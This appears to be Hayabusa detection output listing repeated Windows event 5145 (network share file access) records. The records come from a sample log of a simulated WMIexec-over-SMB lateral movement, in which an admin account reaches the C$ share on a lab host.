10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 
